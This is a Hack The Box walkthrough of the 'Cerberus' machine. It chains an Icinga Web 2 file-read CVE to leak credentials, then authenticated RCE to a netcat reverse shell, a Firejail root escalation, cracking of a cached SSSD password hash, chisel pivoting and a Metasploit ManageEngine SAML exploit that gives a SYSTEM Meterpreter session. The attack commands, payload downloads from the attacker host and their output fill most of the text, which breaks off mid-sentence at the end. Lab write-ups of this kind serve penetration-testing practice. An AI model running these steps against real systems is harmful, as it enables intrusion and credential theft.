# HTB - Cerberus Initial nmap results show a single port open: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ nmap -sC -sV -p- --min-rate 1000 -oN nmap/cerberus -Pn $target_ip Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 07:09 EDT Nmap scan report for cerberus.local ($target_ip) Host is up (0.036s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 8080/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-open-proxy: Proxy might be redirecting requests |_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2 |_http-server-header: Apache/2.4.52 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 143.23 seconds ``` This (thanks to the redirect notice) at least enumerated the domain (cerberus.htb) and the running service, Icinga, on a eponymous subdomain - added domain and subdomain to /etc/hosts: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ sudo vi /etc/hosts ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters # HTB $target_ip cerberus.local icinga.cerberus.local ``` Browsing to http://icinga.cerberus.local:8080/icingaweb2 redirects to a login panel: http://icinga.cerberus.local:8080/icingaweb2/authentication/login ![Screenshot of Icinga Admin Portal](https://hackmd.io/_uploads/rkEzDQuE3.png) Tried default credentials of **icingaadmin:icinga** found with Google but no luck. Tried catching the initial request in Burp to try enumerate version as nothing obvious in the page source; searchsploit had nothing at all for icinga2 though. ![Screenshot of BurpSuite window showing no version infomation for Icinga could be obtained from reponse headers](https://hackmd.io/_uploads/HJNVDm_N2.png) ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ searchsploit icingaweb2 Exploits: No Results Shellcodes: No Results ``` Threw gobuster at it while searching Google for CVE's though nothing noteworthy came back (except perhaps that it kept failing to finish the wordlist at around 99% for some reason...) [This](https://portswigger.net/daily-swig/brace-of-icinga-web-vulnerabilities-easily-chained-to-hack-it-monitoring-software) article from PortSwigger stood out so had a peak, [CVE-2022-24716](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24716) (Aritrary File Read) could be patched in the running version, but, as I don't know what version that is yet I looked for a proof of concept anyway. Found [this](https://raw.githubusercontent.com/doosec101/CVE-2022-24716/main/CVE-2022-24716.py) python PoC script but reading through it I decided to just pull out the payload string and try it quickly with cURL for now: ```python <SNIP> exploit_url=url+"/lib/icinga/icinga-php-thirdparty"+path <SNIP> ``` First attempt was (confusingly) successful as I tried /etc/passwd out of habit and this is supposed to be a Windows box...(WSL or container)? I'd completely blanked that it was picking the box up as Ubuntu when first going over the nmap scan... 🤦‍♂️ ```bash 8080/tcp open http Apache httpd 2.4.52 ((Ubuntu)) ``` ``` ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin pollinate:x:105:1::/var/cache/pollinate:/bin/false usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin matthew:x:1000:1000:matthew:/home/matthew:/bin/bash ntp:x:108:113::/nonexistent:/usr/sbin/nologin sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin redis:x:111:119::/var/lib/redis:/usr/sbin/nologin mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false icingadb:x:999:999::/etc/icingadb:/sbin/nologin ``` Checked out the [Icinga2 Documentation](https://icinga.com/docs/icinga-web/latest/doc/03-Configuration/) to see what useful files I might be able to grab with this vuln. 'config.ini' and 'resources.ini' certainly seem like they'd be worth a look: ``` config.ini General configuration (global, logging, themes, etc.) resources.ini Global resources (Icinga Web 2 database for preferences and authentication, Icinga 2 IDO database) ``` ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini [global] show_stacktraces = "1" show_application_state_messages = "1" config_backend = "db" config_resource = "icingaweb2" module_path = "/usr/share/icingaweb2/modules/" [logging] log = "syslog" level = "ERROR" application = "icingaweb2" facility = "user" [themes] [authentication] ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini [icingaweb2] type = "db" db = "mysql" host = "localhost" dbname = "icingaweb2" username = "matthew" <--- Nice password = "IcingaWebPassword2023" <--- Nicer use_ssl = "0" ``` ```bash echo 'matthew:IcingaWebPassword2023' >> loot/creds.txt ``` Going back to the browser I can login to the admin panel: ![Screenshot showing successful authentication to the Admin Panel for Icinga2](https://hackmd.io/_uploads/rkTsDQ_Nn.png) Also now know the exact service version: ![Screenshot showing service version enumeration](https://hackmd.io/_uploads/Hky0wmdE2.png) Vulnerable to [CVE-2022-24715](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24715) (Authenticated Remote Code Execution) next, with another proof of concept script [here](https://raw.githubusercontent.com/JacobEbben/CVE-2022-24715/main/exploit.py) Tried messing around with it manually via Burp and the web app for a while by adding a user and an ssh key according to [this](https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/)... ![Screenshot of graphical explanaton of Icing Web Interface Vuln from SonarSource](https://hackmd.io/_uploads/HkvtTE_E3.png) ...but it was giving me too much lip, first issues with the key format (not using a passphrase when generating it seemed to be the resolution here, but NFI why - encoding issue, I think). After getting over that hurdle I just couldn't seem to execute any PHP code with it - again, would assume encoding issue. ![Screenshot of Add SSH Identity](https://hackmd.io/_uploads/rJ-g6EOE2.png) ![Screenshot of Add User](https://hackmd.io/_uploads/B1YJ6NdN3.png) Knowing there was likely a much easier route, I went for the above PoC script...don't really understand why this was any better than the manual method because it seemed to be doing the exact same thing: ![Screenshot of source code for Python exploit](https://hackmd.io/_uploads/By2mJB_En.png) :man-shrugging: Needed an SSH key in PEM format either way, so: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools] └─$ ssh-keygen -t rsa -m PEM -f key Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in key Your public key has been saved in key.pub The key fingerprint is: SHA256:oSBt+tCEuHfEfDQ/+t/v7k0PIa886eoIgZ3IEWKMw+I kali@kali The key's randomart image is: +---[RSA 3072]----+ |.oo . o | |++.* o o | |+.o X . + | | E O B + o | |. + * * S . . | | . + o o . | | . . . .o .| | . o oo. +.| | ..+o=*= o| +----[SHA256]-----+ ``` Fired up netcat on 9001 to catch my shell... ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ nc -lvnp 9001 listening on [any] 9001 ... ``` ...and executed the [CVE-2022-24715](https://raw.githubusercontent.com/JacobEbben/CVE-2022-24715/main/exploit.py) PoC script in another terminal: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools] └─$ python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2/ -I 10.10.14.76 -P 9001 -u matthew -p IcingaWebPassword2023 -e key [INFO] Attempting to login to the Icinga Web 2 instance... [INFO] Attempting to upload our malicious module... [SUCCESS] The payload appears to be uploaded successfully! [INFO] Modifying configurations... [INFO] Attempting to enable the malicious module... [INFO] Trying to trigger payload! Have a listener ready! [SUCCESS] It appears that a reverse shell was started! [INFO] Removing malicious module file... [INFO] Disabling malicious module... [INFO] Resetting website configuration... [SUCCESS] Cleanup successful! Shutting down... [ALERT] In the process of exploitation, the application logging has been turned off. Log in manually to reset these settings! ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools] └─$ ``` Had Python3 available on the box, so did the usual trick to get fully interactive TTY: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.76] from (UNKNOWN) [$target_ip] 49874 bash: cannot set terminal process group (630): Inappropriate ioctl for device bash: no job control in this shell www-data@icinga:/usr/share/icingaweb2/public$ which python which python www-data@icinga:/usr/share/icingaweb2/public$ which python3 which python3 /usr/bin/python3 www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')" <lic$ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@icinga:/usr/share/icingaweb2/public$ ^Z zsh: suspended nc -lvnp 9001 ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ stty raw -echo && fg [1] + continued nc -lvnp 9001 www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color ``` Stood up a local web server to get [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) onto the machine to look for PrivEsc vectors: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools] └─$ sudo python3 -m http.server 80 [sudo] password for kali: Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... $target_ip - - [30/Apr/2023 15:09:21] "GET /linpeas.sh HTTP/1.1" 200 - ``` ![Screenshot of LinPEAS starting execution](https://hackmd.io/_uploads/rkSfO7u43.png) LinPeas doesn't think we're in a container...interesting. ```bash -rwsr-xr-x 1 root root 464K Jan 19 2022 /usr/bin/firejail (Unknown SUID binary!) <---- This is worth a look though... ``` Googled for 'firejail' and there's yet another CVE with a PoC script that can be leveraged to get root on the Linux container(which I assume is just this FireJail now) Read through the explanation of CVE-2022-31214 'FireJoin' [here](https://seclists.org/oss-sec/2022/q2/188) and made use of [this](https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin) proof of concept script linked at the end of the article (needed to change the extension to .py). ```bash www-data@icinga:/dev/shm$ curl http://10.10.14.76/firejoin.py -o firejoin.py % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 8651 100 8651 0 0 138k 0 --:--:-- --:--:-- --:--:-- 140k www-data@icinga:/dev/shm$ ls firejoin.py linpeas.sh www-data@icinga:/dev/shm$ file firejoin.py firejoin.py: Python script, ASCII text executable www-data@icinga:/dev/shm$ python3 firejoin.py /dev/shm/firejoin.py needs to have the execute bit set for the exploit to work. Run `chmod +x /dev/shm/firejoin.py` and try again. www-data@icinga:/dev/shm$ chmod +x firejoin.py && python3 firejoin.py You can now run 'firejail --join=19941' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell. ``` Fired up another reverse shell with the same method as before on another port: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ nc -lvnp 9002 listening on [any] 9002 ... connect to [10.10.14.76] from (UNKNOWN) [10.129.194.21] 49870 bash: cannot set terminal process group (622): Inappropriate ioctl for device bash: no job control in this shell www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')" <lic$ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@icinga:/usr/share/icingaweb2/public$ ^Z zsh: suspended nc -lvnp 9002 ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ stty raw -echo && fg [1] + continued nc -lvnp 9002 www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color www-data@icinga:/usr/share/icingaweb2/public$ firejail --join=19941 changing root to /proc/19941/root Warning: cleaning all supplementary groups Child process initialized in 13.65 ms www-data@icinga:/usr/share/icingaweb2/public$ su - root@icinga:~# ``` Got root - still no flags though, so nowhere near done...after some flapping about in the wind, checked out /etc/hosts... ```bash root@icinga:~# cat /etc/hosts 127.0.0.1 iceinga.cerberus.local iceinga 127.0.1.1 localhost 172.16.22.1 DC.cerberus.local DC cerberus.local ...revealing this. # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters root@icinga:~# ``` Looking through LinPEAS output again... I'd re-ran it as root just in case, not sure if it made a diference, or if I'd just not picked up on it the first time *(note to self: learn to save output)* but this eventually stood out, being domain related n'all... ```bash [sssd] domains = cerberus.local config_file_version = 2 services = nss, pam [domain/cerberus.local] default_shell = /bin/bash ad_server = cerberus.local krb5_store_password_if_offline = True cache_credentials = True krb5_realm = CERBERUS.LOCAL realmd_tags = manages-system joined-with-adcli id_provider = ad fallback_homedir = /home/%u@%d ad_domain = cerberus.local use_fully_qualified_names = True ldap_id_mapping = True access_provider = ad -rw-r--r-- 1 root root 169 Oct 4 2022 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf [sssd] domains = shadowutils ``` Almost certaintly what we want to target to get onto the Windows machine (172.16.22.1), and some Google only added confirmation: [SSSD Documentation](https://sssd.io/docs/introduction.html) ```bash cache_credentials = True <--- Sounds particularly juicy...wonder where the cache is... ``` Eventually found it with some ```bash find / | grep -i sss ``` ```bash root@icinga:/var/lib/sss/db# ls cache_cerberus.local.ldb config.ldb timestamps_cerberus.local.ldb ccache_CERBERUS.LOCAL sssd.ldb root@icinga:/var/lib/sss/db# ``` Binary format but can 'strings' it well enough.. ```bash root@icinga:/var/lib/sss/db# file cache_cerberus.local.ldb cache_cerberus.local.ldb: TDB database version 6, little-endian hash size 10000 bytes root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb ``` ```bash <SNIP> cachedPassword $6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0 cachedPasswordType <SNIP> ``` ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ echo '$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0' >> hash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ john -w=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 147258369 (?) 1g 0:00:00:00 DONE (2023-04-30 13:06) 2.500g/s 1280p/s 1280c/s 1280C/s jeffrey..letmein Use the "--show" option to display all of the cracked passwords reliably Session completed. ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ ``` Nice.. ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ echo "matthew:147258369" >> loot/creds.txt ``` Need to look for something running on the DC that we can pivot to...try dropping a [compiled nmap for win32](https://github.com/opsec-infosec/nmap-static-binaries/releases/tag/v2) to the box: ```bash! root@icinga:/dev/shm# wget http://10.10.14.76/nmap-x64.tar.gz --2023-04-30 21:30:13-- http://10.10.14.76/nmap-x64.tar.gz Connecting to 10.10.14.76:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10686789 (10M) [application/gzip] Saving to: 'nmap-x64.tar.gz' nmap-x64.tar.gz 100%[===================>] 10.19M 463KB/s in 30s 2023-04-30 21:30:43 (350 KB/s) - 'nmap-x64.tar.gz' saved [10686789/10686789] ``` ```bash Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found MAC Address: 00:15:5D:5F:E8:00 (Microsoft) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` WinRM... but first we'll need to tunnel with [chisel](https://github.com/jpillora/chisel/releases) Attacking machine is the server in reverse mode: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools] └─$ chisel server -p 8888 --reverse ``` And on the Linux box: ```bash! ./chisel client --max-retry-count=1 10.10.14.76:8888 R:5985:172.16.22.1:5985 ``` *You can search for 'chisel' on [ippsec.rocks](https://ippsec.rocks/) for good explanations of all this tunnelling business (awesome resource in general anytime you're stuck but have some keywords you can throw at it).* ```bash! 2023/04/30 17:57:32 server: Reverse tunnelling enabled 2023/04/30 17:57:32 server: Fingerprint 7oPtF2heLbHEu0624ToKDh1dQ/bUjiTB03h+EDZHmds= 2023/04/30 17:57:32 server: Listening on http://0.0.0.0:8888 2023/04/30 17:57:36 server: session#1: tun: proxy#R:5985=>172.16.22.1:5985: Listening ``` Then in a another terminal on attacking box: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\matthew\Documents> whoami cerberus\matthew *Evil-WinRM* PS C:\Users\matthew\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\matthew\Desktop> ls Directory: C:\Users\matthew\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 4/30/2023 12:29 PM 34 user.txt *Evil-WinRM* PS C:\Users\matthew\Desktop> type user.txt f2f8d9bec0fd854c4fee75e0a37594df *Evil-WinRM* PS C:\Users\matthew\Desktop> ``` Finally have User... 😌 Grabbed [WinPEAS](https://github.com/carlospolop/PEASS-ng/releases/tag/20230425-bd7331ea) to look for PrivEsc vector from here and uploaded to the box through Evil-WinRM: ```bash! ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools] └─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\matthew\Documents> upload winPEASany.exe Info: Uploading /home/kali/HackTheBox/Machines/Cerberus/tools/winPEASany.exe to C:\Users\matthew\Documents\winPEASany.exe Data: 2703360 bytes of 2703360 bytes copied Info: Upload successful! ``` ![Screenshot of WinPEAS.exe starting enumeration](https://hackmd.io/_uploads/rJlVnVOEn.png) Spent a while gawping at WinPEAS output, with nothing really jumping out at me initially but there is "ManageEngine" which is non-standard, and on inspection seemed AD related so Googled it and found that there's *yet another* public vulnerability: [CVE_2022_479661](https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html) ```powershell *Evil-WinRM* PS C:\Users\matthew\Documents> cd "C:/Program Files (x86)" *Evil-WinRM* PS C:\Program Files (x86)> ls Directory: C:\Program Files (x86) Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/15/2018 12:28 AM Common Files d----- 5/1/2023 4:08 AM Google d----- 9/7/2022 4:34 AM Internet Explorer d----- 1/29/2023 11:12 AM ManageEngine <--- d----- 9/15/2018 12:19 AM Microsoft.NET d----- 8/24/2021 7:47 AM Windows Defender d----- 8/24/2021 7:47 AM Windows Mail d----- 9/7/2022 4:34 AM Windows Media Player d----- 9/15/2018 12:19 AM Windows Multimedia Platform d----- 9/15/2018 12:28 AM windows nt d----- 8/24/2021 7:47 AM Windows Photo Viewer d----- 9/15/2018 12:19 AM Windows Portable Devices d----- 9/15/2018 12:19 AM WindowsPowerShell ``` It's only listening locally on the Windows box though...which means another pivot 😱 ```powershell *Evil-WinRM* PS C:\Users\matthew\Documents> netstat -anop TCP Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 700 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952 TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 700 TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 700 TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 952 TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 700 TCP 0.0.0.0:808 0.0.0.0:0 LISTENING 5552 TCP 0.0.0.0:1500 0.0.0.0:0 LISTENING 5552 TCP 0.0.0.0:1501 0.0.0.0:0 LISTENING 5552 TCP 0.0.0.0:2179 0.0.0.0:0 LISTENING 3424 TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 700 TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 700 TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 5756 TCP 0.0.0.0:9251 0.0.0.0:0 LISTENING 5756 <--- ManageEngine listening locally on 9251 TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2016 TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49459 0.0.0.0:0 LISTENING 3136 ``` Listening port was found [here](https://download.manageengine.com/products/self-service-password/securely-deploy-adselfservice-plus-over-the-internet-for-remote-users.pdf) after some searching. Get another chisel server going on attack box: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools] └─$ chisel server -p 9999 --reverse 2023/05/01 08:45:17 server: Reverse tunnelling enabled 2023/05/01 08:45:17 server: Fingerprint /ouUxxvtKDEl+5tBsDCw23XZj9LHxliOGD6mTJsFzuQ= 2023/05/01 08:45:17 server: Listening on http://0.0.0.0:9999 2023/05/01 08:50:25 server: session#1: tun: proxy#R:9251=>172.16.22.1:9251: Listening ``` Get .exe version of chisel and upload to the Windows box - could just have used Evil-WinRM's built in 'upload' now, but I forgot it was a thing and went with curl: ```powershell *Evil-WinRM* PS C:\Users\matthew\Documents> curl 10.10.14.76/chisel.exe -o chisel.exe ``` ```powershell *Evil-WinRM* PS C:\Users\matthew\Documents> ./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:9251:172.16.22.1:9251 ``` This did...something, as I could hit the page in Firefox now... ![Screenshot showing loading ManageEngine endpoint in Firefox](https://hackmd.io/_uploads/B1XrOEuEh.png) ...but after a bit of loading resources it tries to redirect to dc.cerberus.local (taking its time about it) with some params that made me think it had worked at first, but then it failed to display the page: ![Screenshot showing loading ManageEngine endpoint in Firefox](https://hackmd.io/_uploads/SySiONOE3.png) Or maybe it should be: ```powershell ./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:1080:socks ``` Still couldn't hit it...edited /etc/hosts to point everything at localhost: ```bash #10.129.229.4 cerberus.local incinga.cerberus.local 127.0.0.1 cerberus.local icinga.cerberus.local dc.cerberus.local ``` *Still* couldn't hit it but then it occured to add the SOCKS proxy in Firefox 🤦‍♂️ ![Screenshot of FoxyProxy settings adding 127.0.0.1:1080 as SOCKS5 proxy](https://hackmd.io/_uploads/Sk_atEuE2.png) Then navigating to https://dc.cerberus.local:9251 and I'm finally in... ![Screenshot of successfully hitting the login page](https://hackmd.io/_uploads/HJwb9N_Vh.png) Logged in with matthew@cerberus.local:147258369: ![Screenshot of page once authenticated](https://hackmd.io/_uploads/B1bU5EuE3.png) Not much to see on the page but important GUID in the URL that became important for the next exploit: ``` 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f ``` Fired up MetaSploit for this last step: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ msfconsole , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v6.3.13-dev ] + -- --=[ 2311 exploits - 1205 auxiliary - 412 post ] + -- --=[ 975 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: View advanced module options with advanced Metasploit Documentation: https://docs.metasploit.com/ msf6 > search manageengine ``` ![Screenshot of search results in msfconsole for manageengine](https://hackmd.io/_uploads/S1_ZoEOV3.png) Realised this point (read: after a *lot* more failing) that I had to set the SOCKS proxy for MSF to see the service so backed out and edited proxychains4.conf: ```bash ```bash [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" #socks4 127.0.0.1 9050 socks5 127.0.0.1 1080 ``` Then: ```bash ┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus] └─$ sudo proxychains4 -q bash [sudo] password for kali: ┌──(root㉿kali)-[/home/kali/HackTheBox/Machines/Cerberus] └─# msfconsole ___ ____ ,-"" `. < HONK > ,' _ e )`-._ / ---- / ,' `-._<.===-' / / / ; _ / ; (`._ _.-"" ""--..__,' | <_ `-"" \ <`- : (__ <__. ; `-. '-.__. _.' / \ `-.__,-' _,' `._ , /__,-' ""._\__,'< <____ | | `----.`. | | \ `. ; |___ \-`` \ --< `.`.< `-' =[ metasploit v6.3.13-dev ] + -- --=[ 2311 exploits - 1205 auxiliary - 412 post ] + -- --=[ 975 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more Metasploit Documentation: https://docs.metasploit.com/ msf6 > ``` ```bash msf6 > use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966 [*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > options <SNIP> Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966): ---- --------------- -------- ----------- GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f yes The SAML endpoint GUID ISSUER_URL http://dc.cerberus.local/adfs/services/trust yes The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server Proxies no A proxy chain of format type:host:port[,type:host:port][...] RELAY_STATE no The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth" RHOSTS 172.16.22.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 9251 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI /samlLogin yes The SAML endpoint URL URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. Payload options (cmd/windows/powershell/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.76 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 1 Windows Command View the full module info with the info, or info -d command. msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > exploit [*] Started reverse TCP handler on 10.10.14.76:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] Sending stage (175686 bytes) to 10.129.229.4 [*] Meterpreter session 2 opened (10.10.14.76:4444 -> 10.129.229.4:51935) at 2023-05-01 11:52:38 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM <---- :) meterpreter > pwd C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin meterpreter > cd C:/Users/Administrator/Desktop meterpreter > ls Listing: C:\Users\Administrator\Desktop ======================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2023-03-06 10:00:00 -0500 desktop.ini 100444/r--r--r-- 34 fil 2023-05-01 06:50:45 -0400 root.txt meterpreter > cat root.txt 9473401241e600a4295dda7301d245a9 meterpreter > ``` Note: tried calling MSF's "shell" here to get proper system shell but for some reason it was just hanging indefinitely - couldn't find a quick answer other than updating the MSF version so, meh. Overall, a really fun box and a great opporunity to practice pivoting while keeping the exploits themselves easy enough to work with - can't speak from experience but tempted to call this one "real-world" rather than "CTF-like". It wouldn't suprise me if this one ends up on the [TJ Null 